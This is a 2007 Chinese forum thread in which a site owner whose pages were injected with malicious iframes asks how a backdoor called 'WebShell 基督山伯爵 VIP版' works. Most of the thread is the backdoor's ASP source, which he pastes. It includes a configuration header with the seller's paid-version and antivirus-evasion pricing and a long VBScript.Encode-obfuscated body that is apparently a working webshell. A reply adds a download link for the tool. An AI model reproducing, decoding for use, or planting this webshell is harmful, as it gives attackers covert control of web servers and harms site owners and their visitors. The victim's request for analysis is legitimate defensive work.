“WebShell 基督山伯爵 VIP版” 谁知道此程序的机制

wszhoho 2007-05-24 11:04:38
rt
...全文
1421 6 打赏 收藏 转发到动态 举报
写回复
用AI写文章
6 条回复
切换为时间正序
请发表友善的回复…
发表回复
cloudgamer 2007-05-24
  • 打赏
  • 举报
回复
很厉害
dh20156 2007-05-24
  • 打赏
  • 举报
回复
自己下一个去看看:
http://www.byhack.cn/soft/show.asp?id=10923
wszhoho 2007-05-24
  • 打赏
  • 举报
回复
#@~^LyIBAA==d!4~UtKh2MDvb)&0~2MD~P4+x=]IUJ@!(.@*@!mP4Dn0xvNl-lk^DbwOl4k/OGMX 4m^0`bE@*@!4D@*[ 8/aiEPLP3.MRfdmMkwDrGx,[,J@!zC@*@!4.@*rl2MD /^+l.l"+dwKUk+ wV!/t=2 [P&0l+ N~d!4)U;4,IIUcdYM#=Dn/2G /nRS.kD+cdDD#l3 N~?!8=s; mDkW P"nnmY4`U#l]nlD4'"+w^C^+v?BJwJSE'-E#=3x9Po; mYrG )oE ^DkG P"I+hlD4`U#lP,I]nhlY4xIwVm^n`U~r-wJSE'Jb)AUN,s;U1YkGU=2a+;;D+~rj"S'"+$;+kY ?D-nM.lMrl(V+kcEJ`IdJE#ljD-+M(n{In5!+/O U+.\.jl.bl(V+k`rES}Z)S|b99"JJ*lb1YkKUxI;!+dYcErb^YbGxrJbl"WWOKmY4'UnM\nMRtlwhlD4`rJ Jr#l qIKGY{?+M-nDcHmwKlO4vJEzrE#=?n.7+D;xM+5EdDRdD7+D7lMrl(Vn/vJE4DYw|4WkYJrb'EMV=sGV[nMnCY4xI;;nkY`EEwWsN.hlO4Jr#)w1mh+{In;!+dOvJJwHls+JrblnK/{ lnUxR%lAm^3`DsxrJ@!8.@*@!8D@*@!1+UD+M@*@!mP4.+6'vLm\Cd1DkaO)4k/DG.Xc4mmV`bv@*返回@!&l@*@!z1+UOD@*EEr)36/!Yn,?bx0K2 cJ?@*+U2F8+{o+D./4lP1sIYsz46OYn=?Yx+ UY1W=~UX2R:xOYG U/{Ub\;!OOw4YCPY@!h^@*Ys@!tUUI"=|+@*Y^Yr@!&=,n'D&-+D'j,UPR'?:n1m's@*=^+bY@!D??]I?=@*U?UddJm6DO+?U+{z2PDVYz@!dj?I]=)=UpD'sKZWUOwW=[Ml^W^KUpD[^W;GNHAGULDlsKmW9RE DW0LCmp4a6q nlbyR/ O0K6ITax)LrmD`:D[M~SDNH4WUU"]=)U'UD.[~WWMGVsZWM'oP?k9WsPd2X)q+M.N(W=IN[D$sKZGDsoKU'M)^WmKN ;xMWVommI8a6Fyn)byOkUO0KlPDnYCnX~OmDs+k+OSaEkUj?I]=)=LU$x+Mr\ 3drULNlE DGVTlmp8[?xYwGnD}\ 3Jk='M)sW1GDP\n4Kl)IN +UW lbWCDWM+m NXOYUIDLVG/Kx3drULD)^G^Wm UU]I|I)waF8n)byRd Y0G=pD'VK/KxVdk?[D=VK^Ws lUU]]?=+@*zVkY@!Jj=I"Ur~KWdb=2a+;;YPjr 0W3UvJIUMdMW3MV^3kM'MG+MWUhcNGr 8hID!PYMUOEM+* d`G.MDs2bsP0WUObxmW;D@*rw1.m/C7'No+!l LVmY~kam.@!k?U"]=p8/CsP6D Y;Dnn,Vdi;+DDU~!D+ObMUb?U作吗此操执行认要?确c?Dh6kKx`10,`kv#G3/~zKxYbUm6E??]]U#i)`bkO8s/;:cGDM0[[clW2ID+.V9oK'~P^E\mtcCYMn[+KV oM:0K[DmNwcOG#P+MV[sG.vNnW^As4W~jKxYrU10;??]"U|)8?iU?P?~'!+CVc\hnglRw.:6WN4rwcYK+`VdN#IYvhk!4 dM:0G[trwcOKxIbW1Ysz',nP^E-l RrG1YRz.:6WN4rwcYK#`VsU!"x:HlvfrWp8U=nMY4U}~?Pxs+gl G/nVp8h+gl~9,'ECVc\:HCRwDs0GNn4bw YKbis+HCBsU=在!否存件是意文S注名称件全(文H[缩的要压输入U请v=aYGswM'PPmhfg#`U?N8Otlms2ZKUU{xGxDkzmcsrWPs/)n+plh9g'Pn~^E-l m:og:cWD0b[R4W2iD+bCss1?S!U同名不能注意称B全名文件N4的t新建入要请输==Yv:aDGP2~{:n1m`f?#8=tNYnnmZ.U?x{WUDkzm`wk6nP^/N+iChG1',nP^E\mn lssg: W.n6k[R4GwpYnbm:sH=B称U全名件夹的文新建入要请输=UDcsw.KPaP's+gC GUbD?NnG^hsgnU?''KUOkzmvsr0n~^/N+IlsfH=3uUkk?u~U3xPs!\m+Rm:wH:cW.+6k[ 4WwpO+*l:wH=~称?全名件夹标文到目移动输入U请vU2YGhaDxP~lsfHbPUUn.^NoW7ntW=?'{WxDkz^`wkW+,VdN+imhfgU_-=ku?u,UQ'n~^E-l lssHhcWDnWbN tK2pYn*lss1?~称?全名件夹标文到目移动输入=请`?wOWsw.x,+Pmhfg# ?=nD^NwW2X/G?Ux'KUYbb^cwk0n~^/N+Im:9gU3uU-u?kP?_x+,V;-m+Rmhsg:RK.n0bNctGwIO#C:wHUB称U全名文件目标动到入移请输==D`:2.KP2P{h1CPf?#+?k^nsK\=H{UUxbWmDob6`Pbdn+^i):n1CQGU=u-ku?Ux~,_EnC^R-:HmRoM:6WNtb2RDWbis+HCBsU?名称件全标文到目复制输入=请`?wYKh2D{PPC:9H* =U^nsbwz/KUUxxKxOkz^vsr6+pl:w1{~+,V;\m+ Css1s WM+0b[ tKwPYU#rG1YobSlssHhvWDso!V~sKUDkU10!?U"I?E~hWd#=2an;EY~?bx0K3U`r8?+ID;~DDUY!.+p8dnmVPW. Y;Dbp`TDD(?VGE^Is?#库=数据连接请先U?YcnMlV*`U?UU{~~'!+mV \O.(? fMhsKf8Wv kcb134+(/,fG Ybxm6EU=I"=I8!+O. PEMnY)DTp,rYMPUPxEnC^R-YMs?U;h KD4o`G/n+^I)Tb]kDD`UDDs+Pl+#{Frx6`Pbd+Vi)==D@*Y+Uz^。@!语句命令操作5S入j再输据库接数己连确认@*请.xDmn=@!'U\J_KnD Uck81imUU?U{~+,V;\mD jD;VcjDssWG8Di]kDD~?~x!+CVc-YM4j GD:oGG4b {fb@!WvibUU节。个字五十的前字段显示据只条数过一 超R'实现查询控制条件可用节,部字的全字段显示即可据时条数示一只显=当P?TxFyD,jDUiU=bUPntHJj;rhP]r~9TC:H4^KC~]S2)$,K3IdP?b~?T{FFM$UOUp#=&yIcuzIZj)?,b?,K\1dj;r9P)9YPh+gCVl8,:2P$J:b]P:3zS=?',!T]FD.iUU=+Ylhng4V:CP]S2z$~K}nGI=Ux~YP,,D.iUU=b**!]c_b]Zj)"PjA~`SSgj:~1}#~~8`qe,qKgPfAPqgP~q&fY`h+HC^+C4]P2,AJPz2P)P"2=Z,=,'0YD]?Y?iZ=FZfxP&I3uAP'v:xl.;/'B"'j2~iAK~?Dls+H8^Kl~,:29b`K?Ux,T,$GDDpjU?!T'8q93,2IquT,:+gCs+m4]K\P]6,sP2d3fAU=x,TP,DDI??=E#['WM/hm/E2~'-v:xCnME/'v?vj2zJ~.U#z?Sn3]`?D`sn1mVnC($K6~gK~q"PU2(gU?'PYP]XYMijU?!T@!8qfA~2"CY~h+gl^+C4,PtP]r,oPCZPJA?2=={PDP]*DDIUU?:+glkU'G/UUGP=~{&TM,?DUiC=Me{eSNInGOMW['`r+plh8g'fdn(lOlGC+ifZ'2DYhW?InLD(\+.'U'U.D7?+)I5VH?PH.'-nMk=f,=P{ D.]?Y=ICUMe{MSNIh/mN'`kIls4H'G/n8mYlGC&pc&Bq'U&nD.\jn?[.'7n+Mij.)\+n.,?5VPjM'-DbUf,U,xFYD,?DUIM?ee9xWM/hmd~nk+(lOl9C~)3f}JY,9n8p:N8 'N=-*'?#O4nm+D^NwG`?WU/b+dcUYthCIU[x.mKE,?Ol9CZi*R~ 2GrJOc9+O K0G/1.tk.{N\kMW?KP?Px!YD,jD#i8+XvDlz.AP +{P.PjOp8d+msP6DUO!D+b`@!!ckbW* cbYM4?^f!sPwWUYbx^W!?U"]Ur~nKdb)A6Z
wszhoho 2007-05-24
  • 打赏
  • 举报
回复
<%@ LANGUAGE = VBScript.Encode%><%
Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
UserPass="196298273193298273198298273185298273144298273138298273137298273137298273137298273140298273"
mName="WebShell 基督山伯爵 VIP版" '你的后门名字
SiteURL="http://192.168.1.7/b2b" '您的网站地址
Copyright="注:请勿用于非法用途,否则后果十三概不负责<br>QQ:10000<br><a href=http://www.byhack.cn>中央红客网安 Byhack.Cn</a>" '版权

BodyColor="#444" '整体页面背景颜色
FontColor="#fff" '普通文字颜色
LinkColor="#eee" '链接颜色
BorderColor="#666" '文件边框颜色
LinkOverBJ="#666" '鼠标移到链接上面背景的颜色
LinkOverFont="red" '鼠标移到链接上面文字的颜色

FormColorBj="#ccc" '输入框架背景颜色
FormColorBorder="#000" '输入框架边框颜色


'十三申明
'===========================================================

'1、本WebShell可用作网站安全测试。请勿将此用作非法用途,因本WebShell引起的一切法律责任由使用者承担。
'2、本版为十三WebShell VIP终结版,修复了以前版的四处BUG,本版售价80元,请购买后不要外传。做免杀50元。
'3、鄙视那些拿十三WebShell加后门且加上我的联系信息的人,妈的,你做坏事,却留我的联系信息。希望大家拿到SHELL后检测后检测后再使用,以免造成不必要的损失。本版生成默认版后大小:75KB
'4、联系QQ:89625866 425585677 闲杂人等不要来打扰。
'5、查看最新动态::http://www.13shell.cn
'===========================================================
wszhoho 2007-05-24
  • 打赏
  • 举报
回复
网站所有程序被挂iframe,并指向病毒网站。找到了server.asp 下载下来运行以后,发现是后门程序,代码加密过,看不懂。
以下几贴将贴完全部代码。
dh20156 2007-05-24
  • 打赏
  • 举报
回复
没听过 - -!

2,100

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 非技术区
社区管理员
  • 非技术区社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧